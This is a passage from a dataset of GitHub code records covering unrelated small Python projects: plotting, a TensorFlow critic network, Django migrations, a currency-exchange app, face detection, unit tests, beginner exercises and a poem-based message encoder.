plt.title('Vector with Binary Search Insertion Time')\n plt.ylabel('Time (s)')\n plt.savefig('vector_insertion.png')\n plt.clf()\n\n df = pd.DataFrame.from_dict(multiset_times, orient='index')\n df = df.transpose()\n df = df.melt(var_name='n', value_name='time')\n df['n'] = df['n'].astype(int)\n df['time'] = df['time'].astype(float)\n sns.lineplot(x='n', y='time', data=df)\n plt.title('Binary Search Tree Insertion Time ')\n plt.savefig('bst_insertion.png')\n plt.clf()\n","repo_name":"sidb70/Algorithm-Engineering-Course-Project","sub_path":"Vector vs BST/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27219651253","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras import regularizers\n\nclass myModel(tf.keras.Model):\n def __init__(self, hparams):\n super(myModel, self).__init__()\n self.hparams = hparams\n\n # Define layers here\n self.Message = tf.keras.models.Sequential()\n self.Message.add(keras.layers.Dense(self.hparams['link_state_dim'],\n activation=tf.nn.selu, name=\"FirstLayer\"))\n\n self.Update = tf.keras.layers.GRUCell(self.hparams['link_state_dim'], dtype=tf.float32)\n\n self.Readout = tf.keras.models.Sequential()\n self.Readout.add(keras.layers.Dense(self.hparams['readout_units'],\n activation=tf.nn.selu,\n kernel_regularizer=regularizers.l2(hparams['l2']),\n name=\"Readout1\"))\n self.Readout.add(keras.layers.Dense(self.hparams['readout_units'],\n activation=tf.nn.selu,\n kernel_regularizer=regularizers.l2(hparams['l2']),\n name=\"Readout2\"))\n self.Readout.add(keras.layers.Dense(1, kernel_regularizer=regularizers.l2(hparams['l2']),\n name=\"Readout3\"))\n\n def build(self, input_shape=None):\n # Create the weights of the layer\n self.Message.build(input_shape=tf.TensorShape([None, self.hparams['link_state_dim']*2]))\n self.Update.build(input_shape=tf.TensorShape([None,self.hparams['link_state_dim']]))\n self.Readout.build(input_shape=[None, self.hparams['link_state_dim']])\n self.built = True\n\n #@tf.function\n def call(self, link_state, first_critic, second_critic, num_edges_critic, training=False):\n\n # Execute T times\n for _ in range(self.hparams['T']):\n # We have the combination of the hidden states of the main nodes with the neighbours\n mainNodes = tf.gather(link_state, first_critic)\n neighNodes = tf.gather(link_state, second_critic)\n\n nodesConcat = tf.concat([mainNodes, neighNodes], axis=1)\n\n ### 1.a Message passing for node link with all it's neighbours\n outputs = self.Message(nodesConcat)\n\n ### 1.b Sum of output values according to link id index\n edges_inputs = tf.math.unsorted_segment_sum(data=outputs, segment_ids=second_critic, num_segments=num_edges_critic)\n\n ### 2. Update for each link\n # GRUcell needs a 3D tensor as state because there is a matmul: Wrap the link state\n outputs, links_state_list = self.Update(edges_inputs, [link_state])\n\n link_state = links_state_list[0]\n\n # Perform sum of all hidden states\n edges_combi_outputs = tf.math.reduce_sum(links_state_list, axis=1)\n\n r = self.Readout(edges_combi_outputs, training=training)\n return r","repo_name":"paulalmasan/DRL-GNN-PPO","sub_path":"PPO/criticPPO.py","file_name":"criticPPO.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"30115683653","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport mptt.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('crm', '0001_initial'),\n ('dm', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Article',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('code', models.CharField(max_length=128, verbose_name='code')),\n ('description', models.CharField(max_length=255, verbose_name='description')),\n ('measure_unit', models.CharField(max_length=10, null=True, verbose_name='measure unit', blank=True)),\n ('packaging', models.PositiveIntegerField(default=1, verbose_name='standard packaging')),\n ('enabled', models.BooleanField(default=True, verbose_name='enabled')),\n ('control_stock', models.BooleanField(default=False, verbose_name='control stock')),\n ('stock', models.PositiveIntegerField(default=0, verbose_name='stock')),\n ('stock_alert', models.PositiveIntegerField(default=0, verbose_name='stock alert')),\n ],\n options={\n 'ordering': ['-id'],\n 'verbose_name': 'article',\n 'verbose_name_plural': 'articles',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Brand',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50, verbose_name='name')),\n ],\n options={\n 'ordering': ['name'],\n 'verbose_name': 'brand',\n 'verbose_name_plural': 'brands',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Group',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50, verbose_name='name')),\n ('lft', models.PositiveIntegerField(editable=False, db_index=True)),\n ('rght', models.PositiveIntegerField(editable=False, db_index=True)),\n ('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),\n ('level', models.PositiveIntegerField(editable=False, db_index=True)),\n ('parent', mptt.fields.TreeForeignKey(related_name='children', blank=True, to='wm.Group', null=True)),\n ],\n options={\n 'verbose_name': 'group',\n 'verbose_name_plural': 'groups',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SupplierCode',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('code', models.CharField(max_length=50, verbose_name='code')),\n ('article', models.ForeignKey(verbose_name='article', to='wm.Article')),\n ('company', models.ForeignKey(verbose_name='company', to='crm.Company')),\n ],\n options={\n 'verbose_name': 'supplier code',\n 'verbose_name_plural': 'supplier codes',\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='suppliercode',\n unique_together=set([('article', 'company')]),\n ),\n migrations.AddField(\n model_name='article',\n name='brand',\n field=models.ForeignKey(verbose_name='brand', blank=True, to='wm.Brand', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='article',\n name='documents',\n field=models.ManyToManyField(related_name='articles', null=True, verbose_name='documents', to='dm.Document', blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='article',\n name='group',\n field=models.ForeignKey(verbose_name='group', to='wm.Group'),\n preserve_default=True,\n ),\n migrations.AlterUniqueTogether(\n name='article',\n unique_together=set([('code', 'brand')]),\n ),\n ]\n","repo_name":"jantoniomartin/django-machinery","sub_path":"wm/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4477452299","text":"# Given an array of integers, find the length of the longest sub-array with a sum that equals 0.\n\n# Examples: \n\n# Input: arr[] = {15, -2, 2, -8, 1, 7, 10, 23};\n# Output: 5\n# Explanation: The longest sub-array with \n# elements summing up-to 0 is {-2, 2, -8, 1, 7}\n\n# BruteForce:- This involves the use of brute force where two nested loops are used. \n# The outer loop is used to fix the starting position of the sub-array, and the inner loop is used for\n# the ending position of the sub-array and if the sum of elements is equal to zero, then increase the count\n\n# Efficient Approach: The brute force solution is calculating the sum of each and every sub-array and checking whether \n# the sum is zero or not. Let’s now try to improve the time complexity by taking an extra space of ‘n’ length. \n# The new array will store the sum of all the elements up to that index. The sum-index pair will be stored in a hash-map. \n# A Hash map allows insertion and deletion of key-value pair in constant time. Therefore, the time complexity remains unaffected.\n# So, if the same value appears twice in the array, it will be guaranteed that the particular array will be a zero-sum sub-array. \n\ndef findLongestSubarrayZero(nums):\n ans=0\n hmp={}\n s=0\n for i in range(len(nums)):\n s+=nums[i]\n if s== 0:\n ans=i+1\n else:\n if s not in hmp:\n hmp[s]=i\n else:\n ans=max(ans,i-hmp[s])\n return ans\n\nnums=[15, -2, 2, -8, 1, 7, 10, 23]\nprint(findLongestSubarrayZero(nums))\n \n \n ","repo_name":"thekuldeep07/SDE-SHEET","sub_path":"longestSubarraywithSum Zero.py","file_name":"longestSubarraywithSum Zero.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41789718690","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('freelance_utils', '0003_auto_20150805_1907'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='account',\n name='services',\n field=models.ManyToManyField(to='freelance_utils.Service'),\n ),\n ]\n","repo_name":"PyUnchained/freelance_utils","sub_path":"migrations/0004_auto_20150805_1907.py","file_name":"0004_auto_20150805_1907.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38581759329","text":"from django.shortcuts import render\nfrom .exchanger import Exchanger\nfrom .forms import ExchangeForm, HistoryForm\nfrom .currencies import Currencies\nfrom django.http import HttpResponseRedirect\nimport arrow\n\n\nexch = Exchanger()\ncurrencies = Currencies()\n\ntry: \n exch.currency_live\nexcept AttributeError:\n exch.get_live_currency()\n\ndef index(request):\n return HttpResponseRedirect('/exchange/?from=eur&to=kzt&amount=1')\n\ndef exchanger_form(request):\n if request.method == 'POST':\n form = ExchangeForm(request.POST)\n if form.is_valid():\n from_curr = form.cleaned_data[\"from_currency\"]\n to_curr = form.cleaned_data[\"to_currency\"]\n amt = form.cleaned_data[\"amount\"]\n return HttpResponseRedirect('/exchange/?from={}&to={}&amount={}'.format(from_curr, to_curr, amt))\n\n else:\n from_curr, to_curr, amt = validate_url_params(request)\n form = ExchangeForm(initial={\n 'from_currency': from_curr,\n 'to_currency': to_curr,\n 'amount': amt\n })\n \n result = exch.exchange(from_curr, to_curr, float(amt))\n\n return render(request, 'exchangeapp/exchanger_form.html', {\n 'form': form, \n 'exchange_result': round(result, 3), \n 'from': from_curr.upper(),\n 'to': to_curr.upper(),\n 'amt': amt\n })\n\ndef history(request):\n try:\n exch.two_week_history\n except AttributeError:\n exch.get_two_week_history()\n\n if request.method == 'POST':\n form = HistoryForm(request.POST)\n if form.is_valid():\n from_curr = form.cleaned_data[\"from_currency\"]\n to_curr = form.cleaned_data[\"to_currency\"]\n return HttpResponseRedirect('/history/?from={}&to={}'.format(from_curr, to_curr))\n\n else:\n from_curr, to_curr, _ = validate_url_params(request)\n form = HistoryForm(initial={\n 'from_currency': from_curr,\n 'to_currency': to_curr\n })\n changes, current = cross_rate_changes(from_curr, to_curr)\n\n return render(request, 'exchangeapp/history.html', {\n 'form': form, \n 'changes': changes, \n 'current': round(current, 5)\n })\n\ndef cross_rate_changes(from_curr, to_curr):\n changes = {}\n for i in range(1, 15):\n arrow_obj = arrow.now().shift(days=-i)\n rate = exch.exchange_past(from_curr, to_curr, 1, arrow_obj.format('MMM DD, YYYY'))\n changes[arrow_obj.format('MMM DD, YYYY')] = round(rate, 5)\n return [changes, exch.exchange(from_curr, to_curr, 1)]\n\ndef validate_url_params(request):\n from_curr = request.GET.get('from', 'eur')\n from_curr = from_curr if from_curr.lower() in currencies.as_list() else 'eur'\n to_curr = request.GET.get('to', 'kzt')\n to_curr = to_curr if to_curr.lower() in currencies.as_list() else 'kzt'\n amt = request.GET.get('amount', 1)\n try:\n amt = abs(float(amt))\n except ValueError:\n amt = 1\n return [from_curr, to_curr, amt]","repo_name":"andrijasinski/exchanger","sub_path":"exchangeapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30947100860","text":"import requests\nimport json\nimport time\n\n# api = \"http://103.247.219.34/api/v2\"\napi = \"http://172.10.0.52:8000/api/v2\"\n\ndef get_identity(uid):\n try:\n r = requests.get(api+\"/user/\"+uid)\n y = json.loads(r.content)\n data = {\"status\":y[\"status\"],\"name\":y[\"name\"]}\n x = json.dumps(data)\n return x\n except Exception as e:\n print(e)\n\ndef post_attendance(json,image):\n try:\n r = requests.post(api+\"/attendance/\",files=image,data=json,headers={\"Accept\":\"application/json\"})\n print(r.content)\n except Exception as e:\n print(e)\n\ndef post_register(image,json):\n try:\n r = requests.post(api+\"/register/verify\",files=image,data=json,headers={\"Accept\":\"application/json\"})\n print(r.content)\n except Exception as e:\n print(e)\ndef track(jsons):\n try:\n time.sleep(3)\n r = requests.post(api+\"/detect/\",data=jsons,headers={\"Accept\":\"application/json\"})\n print(r.code)\n # y = json.loads(r.content)\n # if y[\"status\"] == \"true\": \n # print(\"Deteksi Berhasil\")\n except Exception as e:\n print(e)","repo_name":"AthanatiusC/V-CORE","sub_path":"Face/LBPH/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45178508206","text":"#!../venv/bin/python\nimport unittest\n\nfrom flask import Flask\nfrom flask.ext.testing import TestCase\n\nimport fixtures\nimport models\n\nclass ShiftPersonTestCase(TestCase):\n database_uri = \"sqlite:///shiftperson_unittest.db\"\n app = Flask(__name__)\n app.config['SQLALCHEMY_DATABASE_URI'] = database_uri\n\n\n def create_app(self):\n app = Flask(__name__)\n app.config['SQLALCHEMY_DATABASE_URI'] = self.database_uri\n return app\n\n @classmethod\n def setUpClass(self):\n models.create_tables(self.app)\n fixtures.install(self.app, *fixtures.shift_test_data)\n self.db = models.init_app(self.app)\n\n @classmethod\n def tearDownClass(self):\n self.db.session.remove()\n self.db.drop_all()\n\n def resetDB(self):\n self.db.session.remove()\n self.db.drop_all()\n models.create_tables(self.app)\n fixtures.install(self.app, *fixtures.shift_test_data)\n self.db = models.init_app(self.app)\n\n\n \"\"\" Test that shift_person relationships are defined and the model represents them correctly. \"\"\"\n def test_shiftperson_model(self):\n current = models.ShiftPerson.query.filter_by(pk=1).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 1)\n self.assertEqual(current.personFK, 3)\n \n current = models.ShiftPerson.query.filter_by(pk=2).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 1)\n self.assertEqual(current.personFK, 4)\n \n current = models.ShiftPerson.query.filter_by(pk=3).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 2)\n self.assertEqual(current.personFK, 4)\n \n current = models.ShiftPerson.query.filter_by(pk=4).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 2)\n self.assertEqual(current.personFK, 5)\n \n current = models.ShiftPerson.query.filter_by(pk=5).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 3)\n self.assertEqual(current.personFK, 3)\n \n current = models.ShiftPerson.query.filter_by(pk=6).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 3)\n self.assertEqual(current.personFK, 5)\n \n current = models.ShiftPerson.query.filter_by(pk=7).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 4)\n self.assertEqual(current.personFK, 3)\n \n current = models.ShiftPerson.query.filter_by(pk=8).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 4)\n self.assertEqual(current.personFK, 4)\n \n current = models.ShiftPerson.query.filter_by(pk=9).first()\n self.assertIsNotNone(current)\n self.assertEqual(current.shiftFK, 4)\n self.assertEqual(current.personFK, 5)\n\n\n \"\"\" Test that we can retieve the shift from the shift-person assignment. \"\"\"\n def test_shiftperson_shift_relationship(self):\n # Define prerequisite data.\n key = 8\n personKey = 4\n # Retrieve the target object directly.\n direct = models.Person.query.filter_by(entityFK=personKey).first()\n self.assertIsNotNone(direct)\n self.assertEqual(direct.entityFK, personKey)\n # Retrieve the containing object.\n host = models.ShiftPerson.query.filter_by(pk=key).first()\n self.assertIsNotNone(host)\n self.assertEqual(host.personFK, direct.entityFK)\n # Retrieve the target object through the containing object.\n target = host.person\n self.assertIsNotNone(target)\n self.assertEqual(direct.__repr__(), target.__repr__())\n\n\n \"\"\" Test adding a Shift-Person assignment to the database \"\"\"\n def test_shiftperson_add(self):\n # Verify state of related tables before operation.\n shiftPersonCount = models.ShiftPerson.query.count()\n shiftCount = models.Shift.query.count()\n personCount = models.Person.query.count()\n \n # Define prerequisite data.\n shiftKey=1\n personKey=5\n target = models.ShiftPerson(shiftFK=shiftKey, personFK=personKey)\n\n # Verify that the data does not already exist.\n fetched = models.ShiftPerson.query.filter_by(shiftFK=shiftKey, personFK=personKey).first()\n self.assertIsNone(fetched)\n \n # Perform the operation.\n self.db.session.add(target)\n self.db.session.commit()\n\n # Verify that the data was added, and only added once.\n fetchedList = models.ShiftPerson.query.filter_by(shiftFK=shiftKey, personFK=personKey)\n self.assertIsNotNone(fetchedList)\n count = 0\n for item in fetchedList:\n self.assertEqual(item.shiftFK, shiftKey)\n self.assertEqual(item.personFK, personKey)\n count += 1\n self.assertEqual(count, 1)\n \n # Verify state of related tables before operation.\n shiftPersonCountAfter = models.ShiftPerson.query.count()\n shiftCountAfter = models.Shift.query.count()\n personCountAfter = models.Person.query.count()\n self.assertTrue(shiftPersonCountAfter == shiftPersonCount + 1) \n self.assertTrue(shiftCountAfter == shiftCount)\n self.assertTrue(personCountAfter == personCount)\n\n\n \"\"\" Test deleting a shift-person assignment. \"\"\"\n def test_shiftperson_delete(self):\n # Verify state of related tables before operation.\n shiftPersonCount = models.ShiftPerson.query.count()\n shiftCount = models.Shift.query.count()\n personCount = models.Person.query.count()\n \n # Define required test data.\n key = 9\n\n # Verify that prerequisite data exists.\n target = models.ShiftPerson.query.filter_by(pk=key).first()\n self.assertIsNotNone(target)\n\n # Perform the operation.\n self.db.session.delete(target)\n self.db.session.commit()\n\n # Verify that the record has been removed.\n target = models.ShiftPerson.query.filter_by(pk=key).first()\n self.assertIsNone(target)\n \n # Verify state of related tables before operation.\n shiftPersonCountAfter = models.ShiftPerson.query.count()\n shiftCountAfter = models.Shift.query.count()\n personCountAfter = models.Person.query.count()\n self.assertTrue(shiftPersonCountAfter == shiftPersonCount - 1) \n self.assertTrue(shiftCountAfter == shiftCount)\n self.assertTrue(personCountAfter == personCount)\n\n\ndef suite():\n # Define the container for this module's tests.\n suite = unittest.TestSuite()\n\n # Add tests to suite.\n suite.addTest(ShiftPersonTestCase('test_shiftperson_model'))\n suite.addTest(ShiftPersonTestCase('test_shiftperson_shift_relationship'))\n suite.addTest(ShiftPersonTestCase('test_shiftperson_add'))\n suite.addTest(ShiftPersonTestCase('test_shiftperson_delete'))\n \n return suite\n \n\nif __name__ == \"__main__\":\n unittest.TextTestRunner().run(suite())\n","repo_name":"umworkma/Comp4350","sub_path":"ESA/unit_tests_shiftperson.py","file_name":"unit_tests_shiftperson.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30242700069","text":"#Program to illustrate simple for loop\r\nnumbers = [1, 10, 20, 30, 40, 50]\r\nsum = 0\r\n# Find sum of all the numbers using for loop \r\n\r\nfor i in range(0,len(numbers)):\r\n\tsum=sum+numbers[i]\r\nprint (\"The sum of numbers is\", sum ) # print sum here\r\n\r\n\r\ncolors = ['red', 'orange', 'green', 'yellow', 'white', 'violet']\r\nfor j in (colors):\r\n\tprint(j)\r\n# Similarly ierate over the given colors and print the colors\r\n","repo_name":"garladinne/python_codetantra","sub_path":"forloop1_list.py","file_name":"forloop1_list.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11656914494","text":"\"\"\"\nurl : \nGiven two numbers 'N' and 'S' , find the largest number that can be formed with 'N' digits and whose sum of digits should be equals to 'S'.\n\nInput\n\nThe first line of input contains an integer T denoting the number of test cases. Then T test cases follow. The first line of each test case contains\ntwo space separated integers N and S, where N is the number of digits and S is the sum.\n\nOutput\n\nPrint the largest number that is possible.\nIf their is no such number, then print -1\n\nConstraints:\n\n1 <= T <= 30\n1 <= N <= 50\n0 <= S <= 500\n\nExample\n\nInput\n2\n2 9\n3 20\n\nOutput\n\n90\n992\nExpected Time Complexity: O(n)\n\n\"\"\"\n\ndef largest_number(n,s):\n if s==0:\n return -1\n digit = 9\n number = \"\"\n while(s>=0 and digit >=0 and len(number)= 0:\n s = s - digit\n number = number + str(digit)\n else:\n digit = digit - 1\n if s>0:\n return -1\n else:\n return number\n \n\ndef main():\n t = int(input().strip())\n for i in range(0,t):\n numbers = input().strip().split(\" \")\n n = int(numbers[0])\n k = int(numbers[1])\n print(largest_number(n,k))\n\nif __name__ == '__main__':\n main()","repo_name":"amitkmr/coding-questions","sub_path":"Greedy/largest_number_possible.py","file_name":"largest_number_possible.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"38786234301","text":"counter = 100 #İnteger değer\nmiles = 1000.0 #Float Değer \nname = \"John\" #String Değer\n\n#İnt değer. Tam sayı değerleri tutar. \"\" içine yazılan her şey string ifadedir. Pythonda değişkenlerin tipi belirtilmez. \nx = 10\ny = 20\nz = \"Yaren\" #String değer\ntcNo = \"45485418465146\" #Tc no genelde string olarak tutulur. Çünkü toplamıyoruz. Telefon numaralarıda öyledir. Çarpmayız,toplamayız o yüzden çift tırnak içinde tutulur.Eğer ihtiyacın olursa tip dönüşümü yapabilirsin.\n\nfloatNo = 4595.45644 #Float ondalıklı sayılardır.\n\nprint(x + 10) #Print ile ekrana yazdırırız.\nprint(\"Hello\",z)\nprint(floatNo)\nprint(type(floatNo)) #Type ile veri tipini görebiliriz. İnt mi,float mı,string mi gibi.\n\n\n\n","repo_name":"yarenahlatci/PythonNotebook","sub_path":"PYTHON-NOTEBOOK/BÖLÜM1/DEĞİŞKENLER.py","file_name":"DEĞİŞKENLER.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1509319748","text":"'''16. Escribir un programa que pida al usuario un número entero y muestre por pantalla si es\npar o impar'''\n\nentero = int(input(\"Por favor ingrese un número: \\n\")) \n\n#funcion que define si es par o impar\ndef ParImpar():\n num = entero%2\n if num == 0:\n print(\"El numero \", entero, \"es par\" )\n else:\n print(\"El numero \", entero, \"es impar\" )\n\n#llamado a la función\nParImpar()","repo_name":"angelagn/ApuntesPython","sub_path":"e005_pdf5/e016_ParImpar.py","file_name":"e016_ParImpar.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10983389457","text":"import cv2 as cv\nimport numpy as np\n\nim= cv.imread('mor_teams5.jpg')\n\n\ngray = cv.cvtColor(im, cv.COLOR_BGR2GRAY)\ncv.imshow('Gray Image', gray)\n\nhaar_cascade_modele = cv.CascadeClassifier('haar_face.xml') #for run this app you should to download this file ('haar_face.xml')\n\nfaces_r = haar_cascade_modele.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=11)\n\nprint(f'Number of faces found = {len(faces_r)}')\n\nfor (x,y,w,h) in faces_r:\n cv.rectangle(im, (x,y), (x+w,y+h), (0,255,0), thickness=2)\n\ncv.imshow('Detected ', im)\n\n\n\ncv.waitKey(0)\n","repo_name":"kalil75/python-project-ML-haar-cascade-detection","sub_path":"haar.py","file_name":"haar.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25847441759","text":"import time as tm\nimport random\ndictionary = []\ndef poems():\n global dictionary\n stressed_letters = ['А', 'Я', 'О', 'Ё', 'У', 'Ю', 'Э', 'Е', 'И', 'Ы']\n vowel_letters = ['а', 'я', 'о', 'ё', 'у', 'ю', 'э', 'е', 'и', 'ы']\n\n #message = 'грЕчка скОро бУдет по сОрок'\n with open('message.txt', 'r', encoding='utf-8') as mes_file:\n message = mes_file.readline()\n print(message)\n\n final_dict = {'word': '', 'letters': ''}\n\n # Получение unix-времени и времени в формате гггг-мм-дд чч:мм:сс\n unix_time = int(tm.time())\n # print(unix_time)\n str_date = tm.strftime('%Y-%m-%d %H:%M:%S', tm.localtime(unix_time))\n # print(type(unix_time))\n # print(str_date)\n # Получение времени в формате гггг-мм-дд чч:мм:сс из unix\n t = tm.strptime(str_date, '%Y-%m-%d %H:%M:%S')\n # print(int(tm.mktime(t)))\n key_list = []\n key = \"\".join(str(unix_time))\n\n # print('key=', key)\n\n def dictionary():\n data = []\n\n with open('dataset.txt', 'r', encoding='utf-8') as dict:\n for row in dict:\n data.append(row)\n\n # print(data)\n dictionary = []\n for i in data:\n current_word = ''\n for j in i:\n if j != '\\n':\n current_word += j\n else:\n break\n dictionary.append(current_word)\n\n for i in dictionary:\n dictionary.remove('')\n\n return dictionary\n\n dictionary = dictionary()\n\n # print(dictionary)\n\n def get_stressed_syllable(word):\n # получаем номер уданого слога\n # print(word)\n count = 0\n stressed_letter_num = 0\n # print(count)\n for i in word:\n if i in vowel_letters:\n count += 1\n # print(count, i)\n if i in stressed_letters:\n count += 1\n stressed_letter_num = count\n # print(\"stressed_letter\")\n final_dict.update({'word': word, 'stressed': [count, stressed_letter_num]})\n return count, stressed_letter_num\n\n def message_moving(message, key):\n message = message.split()\n print(message)\n empty_word = '*****'\n poem_first_stage = [i for i in range(34)]\n # print(len(poem_first_stage))\n current_number = 0\n summ_num = current_number\n for i in range(len(message)):\n current_number = int(key[i])\n # print(current_number)\n summ_num += current_number\n # print(summ_num)\n poem_first_stage[summ_num] = message[i]\n poem_first_stage.pop(0)\n for i in poem_first_stage:\n if i not in message:\n poem_first_stage[poem_first_stage.index(i)] = empty_word\n return poem_first_stage\n\n def delete_words_from_dictionary():\n #global dictionary\n for i in dictionary:\n if get_stressed_syllable(i)[0] > 2:\n dictionary.remove(i)\n\n def poem_generate(poem):\n\n ending = ['на', 'го', 'ия']\n variant = 0 # Для случайного выбора одного из вариантов окончания слов в коцне строки для рифмы\n #global dictionary\n not_this_words = [] # чтобы слова не повторялись, будем добавлять их сюда\n for j in dictionary:\n if len(j) > 1:\n if (j[-2] + j[-1] == ending[variant]):\n word = j + '8'\n not_this_words.append(j)\n # print(not_this_words)\n local_stessed = 0\n\n if get_stressed_syllable(poem[0])[1] == 1:\n ending_str = [3, 7, 11, 15, 19, 23, 27]\n global_stressed = [3, 5, 7, 9, 11] # номера ударных слогов\n current_stressed = 0 # Текущая сумма слогов в ударении\n for i in range(len(poem)):\n\n if poem[i] == '*****':\n stress = get_stressed_syllable(poem[i])[0]\n current_stressed += stress\n flag = False\n\n while flag == False:\n\n # print(i, end = '')\n if i in ending_str:\n word = not_this_words[random.randint(0, len(not_this_words) - 1)]\n else:\n\n word = dictionary[random.randint(0, len(dictionary) - 1)]\n if get_stressed_syllable(word)[1] == 2 and word not in poem:\n flag = True\n # print(flag)\n poem[i] = word\n\n print(not_this_words)\n\n # return poem2\n\n # 1 7 9 12 17\n\n '''\n Описание алгоритма:\n 1. Сумма слогов первой строки = 9\n 2. Сумма слогов второй строки = 8\n 3. Ударные слоги - чётные\n\n 4. Берём слово, определяем его номер.\n 5. Определяем номер этого слова в строке\n 6. Если номер слова в строке - пятый, то запоминаем последние две буквы \n 7. Заполняем все слова ДО рассматриваемого:\n 9. Нужно, чтобы на каждой строчке было 5 слов\n\n\n 5. повторяем так со всеми словами\n 6. \n 7. \n '''\n\n form = \"\"\"_*_*_*_*_\n _*_*_*_*\"\"\"\n\n def print_poem(poem):\n data = ''\n try:\n num = 0\n for i in range(7):\n for j in range(4):\n print(poem[num], end=' ')\n data += poem[num]\n data += ' '\n num += 1\n print()\n data += '\\n'\n\n except IndexError:\n pass\n return data\n def save_poem(poem):\n # Получение unix-времени и времени в формате гггг-мм-дд чч:мм:сс\n unix_time = int(tm.time())\n # print(unix_time)\n str_date = tm.strftime('%Y-%m-%d %H:%M:%S', tm.localtime(unix_time))\n # print(type(unix_time))\n with open('result.txt', 'w', encoding='utf-8') as poem_file:\n poem_file.writelines(poem)\n #poem_file.writelines(str_date)\n\n # print(poem1)\n delete_words_from_dictionary()\n poem1 = message_moving(message, key)\n\n poem_generate(poem1)\n\n\n save_poem(print_poem(poem1))\n\n\n\nif __name__ == '__main__':\n poems()","repo_name":"ilikecinepol/the_poem_encoder","sub_path":"poem.py","file_name":"poem.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18848470702","text":"#Write a program to use the loop to find the factorial of a given number.\n\nno = int(input(\"Enter Number : \"))\n\nf = 1\n\nfor i in range(no,0,-1):\n f *= i\nelse:\n print(\"Factorial of\",no,\"is : \",f)\n","repo_name":"KRUTIKHIRAPARA/Python","sub_path":"Python_Exercise-1/PY_E1_13.py","file_name":"PY_E1_13.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2593276772","text":"if __name__ == \"__main__\":\n with open('day08/input') as input_file:\n input = [\n line.strip().split(\" | \") for line in input_file.readlines()\n ]\n input_signals, output_signals = [], []\n for line in input:\n input_signals.append(\n [\"\".join(sorted(signal)) for signal in line[0].split()]\n )\n output_signals.append(\n [\"\".join(sorted(signal)) for signal in line[1].split()]\n )\n\n first_solution = 0\n for output_signal in output_signals:\n first_solution += len([\n output for output in output_signal\n if len(output) in [2, 3, 4, 7]\n ])\n\n second_solution = 0\n for i in range(len(input)):\n input_line = input_signals[i]\n output_line = output_signals[i]\n signal_patterns = {\n \"1\": next(signal for signal in input_line if len(signal) == 2),\n \"7\": next(signal for signal in input_line if len(signal) == 3),\n 